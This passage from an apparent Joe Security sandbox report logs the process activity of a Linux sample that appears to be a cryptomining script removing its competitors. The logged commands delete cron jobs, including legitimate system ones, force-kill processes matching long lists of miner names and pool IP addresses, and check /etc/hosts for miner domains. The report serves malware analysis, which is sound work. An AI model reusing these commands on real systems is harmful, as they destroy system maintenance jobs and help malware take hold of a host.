Start time: 19:30:37 Start date: 02/01/2020 Path: /bin/bash Arguments: n/a File size: 1037528 bytes MD5 hash: 5e666695cf08d1638bb85684e30185ee
Analysis Process: crontab PID: 20911 Parent PID: 20803
General
Start time: 19:30:37 Start date: 02/01/2020 Path: /usr/bin/crontab Arguments: crontab - File size: 36080 bytes MD5 hash: ff68fd30f0037fd7e9c1fdf5a035f739
File Activities
File Read
File Written
File Moved
Permission Modified
Analysis Process: bash PID: 20994 Parent PID: 20803
General
Start time: 19:30:37 Start date: 02/01/2020 Path: /bin/bash Arguments: n/a File size: 1037528 bytes MD5 hash: 5e666695cf08d1638bb85684e30185ee
File Activities
Directory Enumerated
Analysis Process: grep PID: 20994 Parent PID: 20803
General
Start time: 19:30:37 Start date: 02/01/2020 Path: /bin/grep
Copyright Joe Security LLC 2020 Page 27 of 38 Arguments: grep -RE .\\/oka|\\/upd|aliyun|curl|jquer.js|kill_m|mmm|systemd|tmp00|trojan|trump|virus|wget|x1|x11 /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly File size: 211224 bytes MD5 hash: fc9b0a0ff848b35b3716768695bf2427
File Activities
File Read
Directory Enumerated
Analysis Process: bash PID: 20995 Parent PID: 20803
General
Start time: 19:30:37 Start date: 02/01/2020 Path: /bin/bash Arguments: n/a File size: 1037528 bytes MD5 hash: 5e666695cf08d1638bb85684e30185ee
Analysis Process: cut PID: 20995 Parent PID: 20803
General
Start time: 19:30:37 Start date: 02/01/2020 Path: /usr/bin/cut Arguments: cut -f 1 -d : File size: 39728 bytes MD5 hash: af0cd4efc9e34a60050e61faac91842d
File Activities
File Read
Analysis Process: bash PID: 20996 Parent PID: 20803
General
Start time: 19:30:37 Start date: 02/01/2020 Path: /bin/bash Arguments: n/a File size: 1037528 bytes MD5 hash: 5e666695cf08d1638bb85684e30185ee
Analysis Process: xargs PID: 20996 Parent PID: 20803
General
Start time: 19:30:37 Start date: 02/01/2020 Path: /usr/bin/xargs Copyright Joe Security LLC 2020 Page 28 of 38 Arguments: xargs rm -f File size: 67800 bytes MD5 hash: d189c4a6ecfb0ca3f5c869690733dd0c
File Activities
File Read
Directory Enumerated
Analysis Process: xargs PID: 21009 Parent PID: 20996
General
Start time: 19:30:37 Start date: 02/01/2020 Path: /usr/bin/xargs Arguments: n/a File size: 67800 bytes MD5 hash: d189c4a6ecfb0ca3f5c869690733dd0c
File Activities
Directory Enumerated
Analysis Process: rm PID: 21009 Parent PID: 20996
General
Start time: 19:30:37 Start date: 02/01/2020 Path: /bin/rm Arguments: rm -f /etc/cron.daily/man-db /etc/cron.daily/cracklib-runtime /etc/cron.daily/cracklib-runtime /etc/cron.daily/mlocate /etc/cron.daily/mlocate /etc/cron.daily/apt-compat /etc/cron.daily/apt-compat /etc/cron.daily/apt-compat /etc/cron.daily/apt-compat /etc/cron.daily/update-notifier-common /etc/cron.daily/update-notifier-common File size: 60272 bytes MD5 hash: b79876063d894c449856cca508ecca7f
File Activities
File Deleted
File Read
Analysis Process: bash PID: 21023 Parent PID: 20803
General
Start time: 19:30:37 Start date: 02/01/2020 Path: /bin/bash Arguments: n/a File size: 1037528 bytes MD5 hash: 5e666695cf08d1638bb85684e30185ee
Copyright Joe Security LLC 2020 Page 29 of 38 Analysis Process: pkill PID: 21023 Parent PID: 20803
General
Start time: 19:30:37 Start date: 02/01/2020 Path: /usr/bin/pkill Arguments: pkill -9 -f ./cron|./oka|/tmp/ddgs|/tmp/idk|/tmp/java|/tmp/keep|/tmp/udevs|/tmp/udk|/tmp/update.sh|/tmp/yarn|/usr/bin/netfs|8220|AliHids|AliYu nDun|Donald|HT8s|Jonason|SzdXM|X13-unix|X17-unix|\\[stea\\]|aegis_|aliyun- service|azipl|cr.sh|crloger|cronds|crun|cryptonight|curn|currn|ddgs|dhcleint|fs- manager|gf128mul|havegeds|httpdz|irqbalanced|java- c|kaudited|kerberods|khugepageds|kintegrityds|kpsmouseds|kswaped|kthrotlds|kw0|kworkerds|kworkre|kwroker|mewrs|migrations| miner|mmm|mr.sh|muhsti|mygit|netdns|networkservice amdicks|pastebin|qW3xT|qwefdas|rctlcli|sleep|stratum|sustes|sustse|sysguard|systeamd|systemd- network|sysupdate|t00ls|thisxxs|Trump|update.sh|vTtHH|watchbog|watchbug|watchog|wipefs|wnTKYg|x3Wq|xig|xmr|zer0 File size: 5 bytes MD5 hash: f3b843351a404d4e8d4ce0ed0775fa9c
File Activities
File Read
Directory Enumerated
Analysis Process: bash PID: 21059 Parent PID: 20803
General
Start time: 19:30:37 Start date: 02/01/2020 Path: /bin/bash Arguments: n/a File size: 1037528 bytes MD5 hash: 5e666695cf08d1638bb85684e30185ee
Analysis Process: netstat PID: 21059 Parent PID: 20803
General
Start time: 19:30:37 Start date: 02/01/2020 Path: /bin/netstat Arguments: netstat -antp File size: 119624 bytes MD5 hash: 78d9a4b9c73de4d9fb0257c5588d67b1
File Activities
File Read
Directory Enumerated
Analysis Process: bash PID: 21060 Parent PID: 20803
General
Start time: 19:30:37
Copyright Joe Security LLC 2020 Page 30 of 38 Start date: 02/01/2020 Path: /bin/bash Arguments: n/a File size: 1037528 bytes MD5 hash: 5e666695cf08d1638bb85684e30185ee
Analysis Process: grep PID: 21060 Parent PID: 20803
General
Start time: 19:30:37 Start date: 02/01/2020 Path: /bin/grep Arguments: grep -E 103.3.62.64|104.140.201.102|104.140.201.42|104.140.201.58|104.140.201.62|104.140.244.186|107.191.99.221|107.191.99.95|119 .9.76.107|123.59.232.42|131.153.56.98|131.153.76.130|138.201.36.249|139.162.81.90|139.99.101.197|139.99.101.198|139.99.101 .232|139.99.102.70|139.99.102.71|139.99.102.72|139.99.102.73|139.99.102.74|139.99.120.50|139.99.120.73|139.99.120.75|139.9 9.123.196|139.99.124.170|139.99.125.38|139.99.156.30|139.99.68.128|142.44.242.100|142.44.243.6|144.217.14.109|144.217.14.1 39|149.202.42.174|1 .83.171|151.80.144.188|151.80.144.253|158.69.25.71|158.69.25.77|164.132.109.110|172.104.165.191|172.105.211.250|172.83.15 5.151:80|178.63.100.197|192.99.69.170|207.246.100.198|213.32.29.143|213.32.74.157|217.182.169.148|37.187.154.79|37.187.95. 110|37.59.43.131|37.59.43.136|37.59.44.193|37.59.44.93|37.59.45.174|37.59.54.205|37.59.55.60|37.9.3.26|45.32.71.82|45.76.65. 223|47.101.30.124|51.15.54.102|51.15.55.100|51.15.55.162|51.15.58.224|51.15.65.182|51.15.67.17|51.15.69.136|51.15.78.68|51.2 55.34.118|51.25 9|51.255.34.80|5.196.13.29|5.196.23.240|5.196.26.96|54.37.7.208|61.155.221.74|66.42.105.146|79.137.82.5|88.99.193.240|88.99. 242.92|91.121.140.167|91.121.2.76|92.222.10.59|92.222.180.119|94.130.12.27|94.130.12.30|94.130.165.85|94.130.165.87|94.23.2 3.52|94.23.247.226 File size: 211224 bytes MD5 hash: fc9b0a0ff848b35b3716768695bf2427
File Activities
File Read
Analysis Process: bash PID: 21061 Parent PID: 20803
General
Start time: 19:30:37 Start date: 02/01/2020 Path: /bin/bash Arguments: n/a File size: 1037528 bytes MD5 hash: 5e666695cf08d1638bb85684e30185ee
Analysis Process: awk PID: 21061 Parent PID: 20803
General
Start time: 19:30:37 Start date: 02/01/2020 Path: /usr/bin/awk Arguments: awk "{print $NF}" File size: 21 bytes MD5 hash: 1bb5d753c2edd5bae269563a5ec6d0fe
File Activities
File Read
Copyright Joe Security LLC 2020 Page 31 of 38 Analysis Process: bash PID: 21062 Parent PID: 20803
General
Start time: 19:30:37 Start date: 02/01/2020 Path: /bin/bash Arguments: n/a File size: 1037528 bytes MD5 hash: 5e666695cf08d1638bb85684e30185ee
Analysis Process: cut PID: 21062 Parent PID: 20803
General
Start time: 19:30:37 Start date: 02/01/2020 Path: /usr/bin/cut Arguments: cut -d/ -f1 File size: 39728 bytes MD5 hash: af0cd4efc9e34a60050e61faac91842d
File Activities
File Read
Analysis Process: bash PID: 21063 Parent PID: 20803
General
Start time: 19:30:37 Start date: 02/01/2020 Path: /bin/bash Arguments: n/a File size: 1037528 bytes MD5 hash: 5e666695cf08d1638bb85684e30185ee
Analysis Process: xargs PID: 21063 Parent PID: 20803
General
Start time: 19:30:37 Start date: 02/01/2020 Path: /usr/bin/xargs Arguments: xargs kill -9 File size: 67800 bytes MD5 hash: d189c4a6ecfb0ca3f5c869690733dd0c
File Activities
File Read
Directory Enumerated
Copyright Joe Security LLC 2020 Page 32 of 38 Analysis Process: xargs PID: 21104 Parent PID: 21063
General
Start time: 19:30:37 Start date: 02/01/2020 Path: /usr/bin/xargs Arguments: n/a File size: 67800 bytes MD5 hash: d189c4a6ecfb0ca3f5c869690733dd0c
File Activities
Directory Enumerated
Analysis Process: kill PID: 21104 Parent PID: 21063
General
Start time: 19:30:37 Start date: 02/01/2020 Path: /bin/kill Arguments: kill -9 File size: 23152 bytes MD5 hash: 5484331628ba283a0cda9730dafe47f8
File Activities
File Read
Analysis Process: bash PID: 21105 Parent PID: 20803
General
Start time: 19:30:37 Start date: 02/01/2020 Path: /bin/bash Arguments: n/a File size: 1037528 bytes MD5 hash: 5e666695cf08d1638bb85684e30185ee
Analysis Process: rm PID: 21105 Parent PID: 20803
General
Start time: 19:30:37 Start date: 02/01/2020 Path: /bin/rm Arguments: rm -f /home/user/.aliyun* /home/user/.systemd* /home/user/.tmp* /home/user/.trump* /home/user/.wget* /etc/cron.d/*aliyun* /etc/cron.d/*systemd* /etc/cron.d/*trump* /opt/*aliyun* /opt/*systemd* /opt/*trump* File size: 60272 bytes MD5 hash: b79876063d894c449856cca508ecca7f
File Activities
File Deleted
Copyright Joe Security LLC 2020 Page 33 of 38 File Read
Analysis Process: bash PID: 21106 Parent PID: 20803
General
Start time: 19:30:37 Start date: 02/01/2020 Path: /bin/bash Arguments: n/a File size: 1037528 bytes MD5 hash: 5e666695cf08d1638bb85684e30185ee
Analysis Process: cat PID: 21106 Parent PID: 20803
General
Start time: 19:30:37 Start date: 02/01/2020 Path: /bin/cat Arguments: cat /tmp/.X11-unix/01 File size: 52080 bytes MD5 hash: efa10d52f37361f2e3a5d22742f0fcc4
File Activities
File Read
Analysis Process: bash PID: 21107 Parent PID: 20803
General
Start time: 19:30:37 Start date: 02/01/2020 Path: /bin/bash Arguments: n/a File size: 1037528 bytes MD5 hash: 5e666695cf08d1638bb85684e30185ee
Analysis Process: cat PID: 21107 Parent PID: 20803
General
Start time: 19:30:37 Start date: 02/01/2020 Path: /bin/cat Arguments: cat /tmp/.X11-unix/0 File size: 52080 bytes MD5 hash: efa10d52f37361f2e3a5d22742f0fcc4
File Activities
File Read
Copyright Joe Security LLC 2020 Page 34 of 38 Analysis Process: bash PID: 21108 Parent PID: 20803
General
Start time: 19:30:37 Start date: 02/01/2020 Path: /bin/bash Arguments: n/a File size: 1037528 bytes MD5 hash: 5e666695cf08d1638bb85684e30185ee
Analysis Process: grep PID: 21108 Parent PID: 20803
General
Start time: 19:30:37 Start date: 02/01/2020 Path: /bin/grep Arguments: grep -q trump /etc/hosts File size: 211224 bytes MD5 hash: fc9b0a0ff848b35b3716768695bf2427
File Activities
File Read
Analysis Process: bash PID: 21109 Parent PID: 20803
General
Start time: 19:30:37 Start date: 02/01/2020 Path: /bin/bash Arguments: n/a File size: 1037528 bytes MD5 hash: 5e666695cf08d1638bb85684e30185ee
Analysis Process: grep PID: 21109 Parent PID: 20803
General
Start time: 19:30:37 Start date: 02/01/2020 Path: /bin/grep Arguments: grep -q tor2w /etc/hosts File size: 211224 bytes MD5 hash: fc9b0a0ff848b35b3716768695bf2427
File Activities
File Read
Analysis Process: bash PID: 21110 Parent PID: 20803
Copyright Joe Security LLC 2020 Page 35 of 38 General
Start time: 19:30:37 Start date: 02/01/2020 Path: /bin/bash Arguments: n/a File size: 1037528 bytes MD5 hash: 5e666695cf08d1638bb85684e30185ee
Analysis Process: grep PID: 21110 Parent PID: 20803
General
Start time: 19:30:37 Start date: 02/01/2020 Path: /bin/grep Arguments: grep -q "0.0.0.0 aliyun.one" /etc/hosts File size: 211224 bytes MD5 hash: fc9b0a0ff848b35b3716768695bf2427
File Activities
File Read
Analysis Process: bash PID: 21111 Parent PID: 20803
General
Start time: 19:30:37 Start date: 02/01/2020 Path: /bin/bash Arguments: n/a File size: 1037528 bytes MD5 hash: 5e666695cf08d1638bb85684e30185ee
Analysis Process: grep PID: 21111 Parent PID: 20803
General
Start time: 19:30:37 Start date: 02/01/2020 Path: /bin/grep Arguments: grep -q "0.0.0.0 lsd.systemten.org" /etc/hosts File size: 211224 bytes MD5 hash: fc9b0a0ff848b35b3716768695bf2427
File Activities
File Read
Analysis Process: bash PID: 21112 Parent PID: 20803
General
Start time: 19:30:37 Copyright Joe Security LLC 2020 Page 36 of 38 Start date: 02/01/2020 Path: /bin/bash Arguments: n/a File size: 1037528 bytes MD5 hash: 5e666695cf08d1638bb85684e30185ee
Analysis Process: grep PID: 21112 Parent PID: 20803
General
Start time: 19:30:37 Start date: 02/01/2020 Path: /bin/grep Arguments: grep -q "0.0.0.0 pastebin.com" /etc/hosts File size: 211224 bytes MD5 hash: fc9b0a0ff848b35b3716768695bf2427
File Activities
File Read
Analysis Process: bash PID: 21114 Parent PID: 20803
General
Start time: 19:30:37 Start date: 02/01/2020 Path: /bin/bash Arguments: n/a File size: 1037528 bytes MD5 hash: 5e666695cf08d1638bb85684e30185ee
Analysis Process: grep PID: 21114 Parent PID: 20803
General
Start time: 19:30:37 Start date: 02/01/2020 Path: /bin/grep Arguments: grep -q "0.0.0.0 pm.cpuminerpool.com" /etc/hosts File size: 211224 bytes MD5 hash: fc9b0a0ff848b35b3716768695bf2427
File Activities
File Read
Analysis Process: bash PID: 21117 Parent PID: 20803
General
Start time: 19:30:37 Start date: 02/01/2020 Path: /bin/bash Arguments: n/a Copyright Joe Security LLC 2020 Page 37 of 38 File size: 1037528 bytes MD5 hash: 5e666695cf08d1638bb85684e30185ee
Analysis Process: grep PID: 21117 Parent PID: 20803
General
Start time: 19:30:37 Start date: 02/01/2020 Path: /bin/grep Arguments: grep -q "0.0.0.0 systemten.org" /etc/hosts File size: 211224 bytes MD5 hash: fc9b0a0ff848b35b3716768695bf2427
File Activities
File Read
Copyright Joe Security LLC 2020
Copyright Joe Security LLC 2020 Page 38 of 38